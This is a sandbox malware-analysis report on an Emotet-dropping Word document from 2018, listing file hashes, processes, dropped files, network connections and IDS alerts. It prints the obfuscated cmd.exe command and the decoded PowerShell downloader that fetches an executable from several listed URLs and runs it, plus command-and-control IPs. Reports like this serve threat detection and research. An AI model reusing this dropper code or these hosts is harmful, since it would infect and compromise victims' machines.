analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | form-047293681991.doc |
| Full analysis: | https://app.any.run/tasks/069430bb-dc2b-4d4a-89db-d20a1ce06b54 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | November 15, 2018, 04:25:36 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 21:16:00 2018, Last Saved Time/Date: Wed Nov 14 21:16:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5: | 25571A55F9F558CD4BAD7D5C27D5B05C |
| SHA1: | 083390BEA870E20AB81FC981ABF0CF5CAEAFF355 |
| SHA256: | 41750E383527A8FFD5C587F52DEDFCA9C61A067E5C9E1A57603689FEFD6D9CB6 |
| SSDEEP: | 1536:W3Tocn1kp59gxBK85fBt+a9gP30XZRhYx8xTh2hghoxmRUxI/WHxl:W841k/W48iP3chYx8xTh2hghoxmRUxIA |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2828)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2828)
Application was dropped or rewritten from another process
- QWC.exe (PID: 2708)
- QWC.exe (PID: 2796)
- noticesman.exe (PID: 2780)
- noticesman.exe (PID: 3000)
Emotet process was detected
- noticesman.exe (PID: 2780)
EMOTET was detected
- noticesman.exe (PID: 3000)
Downloads executable files from the Internet
- powershell.exe (PID: 1216)
Connects to CnC server
- noticesman.exe (PID: 3000)
SUSPICIOUS
Executes PowerShell scripts
- cmd.exe (PID: 2860)
Executable content was dropped or overwritten
- powershell.exe (PID: 1216)
- QWC.exe (PID: 2796)
Reads Internet Cache Settings
- powershell.exe (PID: 1216)
Application launched itself
- QWC.exe (PID: 2708)
Reads the machine GUID from the registry
- powershell.exe (PID: 1216)
Creates files in the user directory
- powershell.exe (PID: 1216)
Starts itself from another location
- QWC.exe (PID: 2796)
Connects to unusual port
- noticesman.exe (PID: 3000)
INFO
Reads the machine GUID from the registry
- WINWORD.EXE (PID: 2828)
Creates files in the user directory
- WINWORD.EXE (PID: 2828)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2828)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| HeadingPairs: |
|
| TitleOfParts: | - |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 14 |
| Paragraphs: | 1 |
| Lines: | 1 |
| Company: | - |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| Characters: | 13 |
| Words: | 2 |
| Pages: | 1 |
| ModifyDate: | 2018:11:14 21:16:00 |
| CreateDate: | 2018:11:14 21:16:00 |
| TotalEditTime: | - |
| Software: | Microsoft Office Word |
| RevisionNumber: | 1 |
| LastModifiedBy: | - |
| Template: | Normal.dotm |
| Comments: | - |
| Keywords: | - |
| Author: | - |
| Subject: | - |
| Title: | - |
Total processes
44
Monitored processes
7
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2828 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\form-047293681991.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
| 2860 | c:\RojaWpRT\FWuUwikGzOh\iAvDOzDJIq\..\..\..\windows\system32\cmd.exe /C"^s^et [^`'^}=i^;^br^ea&&s^e^t ;^'^?=a^l^th&&^s^et +'^.^;=Nu^U^.ty&&s^e^t ^?^'=^t&&^se^t ^@^,=^;$V^Zr^='^htt^p&&^s^et ]^-^\{=;^Star^t-Proc^e^ss^ ^$WO&&^se^t ^]^#^~=;$N^u^U^ ^=&&^se^t ,^~^{=;^f^or&&^s^et ~^+^@=^om '^ms^x^m^l^2^.^x^mlhtt&&s^et }^{^`^$=^m^'&&^s^et ^~'\^_=^a&&^se^t ^\^$^`^?=^e^ach(^$Ow^k in^ ^$V^Z&&s^e^t ^-,=^u&&s^e^t \^~^_=VvIT&&^s^e^t ^]^,$=^a^t^h()+^'^\&&s^e^t ^?$=^t&&s^e^t ^]^{+_=U^.^s&&^se^t ^[^*?=^ &&s^e^t ^*\^+=:^:G^e&&^s^e^t ^*#^`=^://s&&^s^et .?^;=^k&&^set *^-~^[=^t&&^s^et ^@]^{=G^E^T'^,^$O^wk,0)^;&&^s^et ^*~^`{=yst^e^m.^I^O^.^P^a^th]&&^se^t }^+=^h{^}} ^ &&^se^t ^,{^$=^sy&&^s^et ]^-=^a&&^s^et ^\^'^_=^en&&s^e^t ^}?^\^*=^sp&&^s^et ^_^;`=^}c^a^tc&&^s^e^t ^;^{#[=a^l^on^.&&^s^e^t ^#^{@^~=e(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^\^]=^@&&s^et .^]=^e^m^s&&^se^t ^?^.^-=^$^dKc^.^send();^$N^uU^.o^p&&^se^t _^\=^e &&^s^et ^#^\^?=p^'&&^se^t '^*?^}=()^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^#^~{^,=tt^p^://^afrore^l&&^se^t ^,`^+_=^Te&&^se^t ^[^-=;^$^WOi^=(^[S&&^s^e^t ^]^+?}=tre&&^se^t ^\{=^p&&^s^e^t ^.`=^m^mv^.ru/2zl^w^Z&&^se^t '^.=^wr^ite(^$d^K&&^s^et ^'@^$=r){&&^se^t -^\=^Z&&s^e^t ^#^`*^~=^hi^ps.c^o^m/R&&^s^et ^'^,=^ &&^se^t ^-[=(&&s^e^t _^]=^Gr&&s^e^t ]$^}^[=.c^o^m/^E^IE^g^9&&^se^t +^*^\=^tt^p^://^imsm^a^kin^e^.&&^s^e^t ^`[^;=C^d&&^set ^+.^\@=^I&&^s^et ^#{'^+=^i^l&&^s^e^t {^~]=^we&&^s^et ^_^@^*^;=^'@^')&&^se^t ^?^\=^;&&s^e^t ^.^\=^t^ ^-&&^se^t ^-,^_^$=^p^o&&s^e^t \^+*^]= ^ &&s^e^t @-^'^.=^$^dKc&&^s^et ^+^-=^on&&^s^et ?^~=@^h&&^s^et _^{=s^t&&^s^et ^-^}^\=s^e^B^od^y)^;^$N&&^s^e^t \^.^{^-=^Ob^j^ec^t -c^o^m '&&^s^e^t ^`^*[^@=^av^e^t^o^f&&^s^et #^@^}=^adod^b.^s&&^s^e^t ^,^;^+= ^ &&^set '^+=j^e&&^se^t ^~^*^]^[=^h^t^tp&&^s^et ^,^'[-=c&&^s^e^t `^*'^#=/^3^G^LG&&^se^t ^$^*^'=^Q^qd^@^h^tt^p://as^sis^tive^he&&^s^e^t ^#^*=c&&^se^t ^,^\`='^jv^Y'&&s^et ^,@^?==Ne^w^-^Ob&&^s^et @^{=^ll $^q^s^J^=&&^s^e^t ^-^[@^_=^Q^WC.^e^xe'&&^s^e^t [^$^,=^a&&^s^et ^'^+,=c^om&&^se^t ^,^]-`=c&&^se^t ]^{=SS^'^.^Sp^l&&^s^e^t ;^*?=^W^O^i)&&s^e^t ^*^$}?=^o&&^se^t ^~^$= N^e^w^-&&s^e^t ^#_*^-=Kc^.open(^'&&^se^t ^\^.^?=^b&&s^e^t ^}^]^{*==^ 1^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^,*^;= ^ ^ ^ ^ ^ &&^s^et ^[^\{=)&&^se^t ?#^[^{=r&&^s^e^t }^$^*=^i^on^s&&^s^e^t ;^?^`~=^mp^P&&s^e^t ^$^[=^i^t&&s^e^t .^_=^y{$^d&&s^e^t ^;[^~=r^s^he&&se^t ^,_^;~=I^7@^h&&^s^et ^{?^]=^s&&^s^et ^[^\=^://^ob&&^se^t ;^-=N^uU^.&&se^t ^{^;^[*=^m/g^05^bnc^2^fVE&&^s^et ^`^\{=c.r&&s^e^t ^+^']=^e&&c^a^l^l ^se^t $+{'=%^-,^_^$%%{^~]%%^;[^~%%@^{%%^,^\`%%^@^,%%^[^\%%^~'\^_%%^{?^]%%^;^{#[%%^'^+,%%`^*'^#%%^$^*^'%%;^'^?%%^,{^$%%_^{%%.^]%%]$^}^[%%_^]%%^+.^\@%%^`[^;%%^\^]%%^~^*^]^[%%^*#^`%%^.`%%^,_^;~%%+^*^\%%^,^'[-%%^*^$}?%%^{^;^[*%%?^~%%^#^~{^,%%]^-%%*^-~^[%%}^$^*%%^#^`*^~%%^\^.^?%%\^~^_%%-^\%%]^{%%^$^[%%^-[%%^_^@^*^;%%^[^-%%^*~^`{%%^*\^+%%^?$%%^,`^+_%%;^?^`~%%^]^,$%%^-^[@^_%%^[^\{%%^?^\%%@-^'^.%%^'^,%%^,@^?%%'^+%%^,^]-`%%^.^\%%^#^*%%~^+^@%%^#^\^?%%^]^#^~%%^~^$%%\^.^{^-%%#^@^}%%^]^+?}%%[^$^,%%}^{^`^$%%,^~^{%%^\^$^`^?%%^'@^$%%^?^'%%?#^[^{%%.^_%%^#_*^-%%^@]^{%%^?^.^-%%^\^'^_%%'^*?^}%%+'^.^;%%^\{%%_^\%%^}^]^{*%%;^-%%'^.%%^`^\{%%^+^']%%^}?^\^*%%^+^-%%^-^}^\%%^-,%%^]^{+_%%^`^*[^@%%^#{'^+%%^#^{@^~%%;^*?%%]^-^\{%%[^`'^}%%.?^;%%^_^;`%%}^+%%\^+*^]%%^,*^;%%^[^*?%%^,^;^+%&&c^al^l %^$^+^{^'%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 1216 | powershell $qsJ='jvY';$VZr='http://obasalon.com/3GLGQqd@http://assistivehealthsystems.com/EIEg9GrICd@http://smmv.ru/2zlwZI7@http://imsmakine.com/g05bnc2fVE@http://afrorelationships.com/RbVvITZSS'.Split('@');$WOi=([System.IO.Path]::GetTempPath()+'\QWC.exe');$dKc =New-Object -com 'msxml2.xmlhttp';$NuU = New-Object -com 'adodb.stream';foreach($Owk in $VZr){try{$dKc.open('GET',$Owk,0);$dKc.send();$NuU.open();$NuU.type = 1;$NuU.write($dKc.responseBody);$NuU.savetofile($WOi);Start-Process $WOi;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2708 | "C:\Users\admin\AppData\Local\Temp\QWC.exe" | C:\Users\admin\AppData\Local\Temp\QWC.exe | — | powershell.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: ApiSet Stub DLL Exit code: 0 Version: 6.1.76 | ||||
| 2796 | "C:\Users\admin\AppData\Local\Temp\QWC.exe" | C:\Users\admin\AppData\Local\Temp\QWC.exe | QWC.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: ApiSet Stub DLL Exit code: 0 Version: 6.1.76 | ||||
| 2780 | "C:\Users\admin\AppData\Local\Microsoft\Windows\noticesman.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\noticesman.exe | QWC.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: ApiSet Stub DLL Exit code: 0 Version: 6.1.76 | ||||
| 3000 | "C:\Users\admin\AppData\Local\Microsoft\Windows\noticesman.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\noticesman.exe | noticesman.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: ApiSet Stub DLL Version: 6.1.76 | ||||
Total events
1 699
Read events
1 289
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
2
Text files
3
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7973.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TWI2OUJTY7I49LQL2YY2.temp | — | |
MD5:— | SHA256:— | |||
| 2828 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:C7C89D83F98B3A26FFC7A4BEB5CA338F | SHA256:40052C0133426B313F1A26E7263A9D0774E0AFA501C1D9998A917D69953197E2 | |||
| 2828 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\form-047293681991.LNK | lnk | |
MD5:B7F30ABCD4EF85129BC35C576108ECC6 | SHA256:C6430C6A492518FA282D0D997C191DDAF7A6C0DDEBCF891CFF1672131211893D | |||
| 1216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\QWC.exe | executable | |
MD5:CF6A44675A7A9A30BF05CFA88F7F6D71 | SHA256:EDC86069885FB8C2F0B676F00ACBB16FCD6F4FC510F5C74F5FD7569890C8023B | |||
| 1216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:E7D5E2E6519226323974BB9881880712 | SHA256:BE5F79FA0397853B165E141032E5ABBAE0623F4CAA1B466B72C1E562DF08A0DE | |||
| 2796 | QWC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\noticesman.exe | executable | |
MD5:CF6A44675A7A9A30BF05CFA88F7F6D71 | SHA256:EDC86069885FB8C2F0B676F00ACBB16FCD6F4FC510F5C74F5FD7569890C8023B | |||
| 1216 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\3GLGQqd[1].htm | html | |
MD5:014183A86E73179EEEBEF36FCD5E734B | SHA256:6C4B147E603B6D90C2EAD86E89636841981122C91F711D80284597EC3752DF52 | |||
| 1216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF799dc.TMP | binary | |
MD5:E7D5E2E6519226323974BB9881880712 | SHA256:BE5F79FA0397853B165E141032E5ABBAE0623F4CAA1B466B72C1E562DF08A0DE | |||
| 2828 | WINWORD.EXE | C:\Users\admin\Desktop\~$rm-047293681991.doc | pgc | |
MD5:33D1F89439383B5AEF59A073BA72981E | SHA256:39C181CE6CBDE1660992714834ECAD46832BCFC20BA332D8A3E0A54FDD479E31 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
5
DNS requests
2
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3000 | noticesman.exe | GET | — | 177.242.156.119:80 | http://177.242.156.119/ | MX | — | — | malicious |
1216 | powershell.exe | GET | 200 | 139.59.71.160:80 | http://obasalon.com/3GLGQqd/ | IN | executable | 428 Kb | malicious |
1216 | powershell.exe | GET | 301 | 139.59.71.160:80 | http://obasalon.com/3GLGQqd | IN | html | 236 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1216 | powershell.exe | 139.59.71.160:80 | obasalon.com | Digital Ocean, Inc. | IN | suspicious |
3000 | noticesman.exe | 177.242.156.119:80 | — | SERVICIO Y EQUIPO EN TELEFONÍA INTERNET Y TV S.A. DE C.V. | MX | malicious |
3000 | noticesman.exe | 189.244.86.184:990 | — | Uninet S.A. de C.V. | MX | suspicious |
3000 | noticesman.exe | 50.78.167.65:7080 | — | Comcast Cable Communications, LLC | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
obasalon.com |
| malicious |
dns.msftncsi.com |
| shared |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1216 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1216 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3000 | noticesman.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
1 ETPRO signatures available at the full report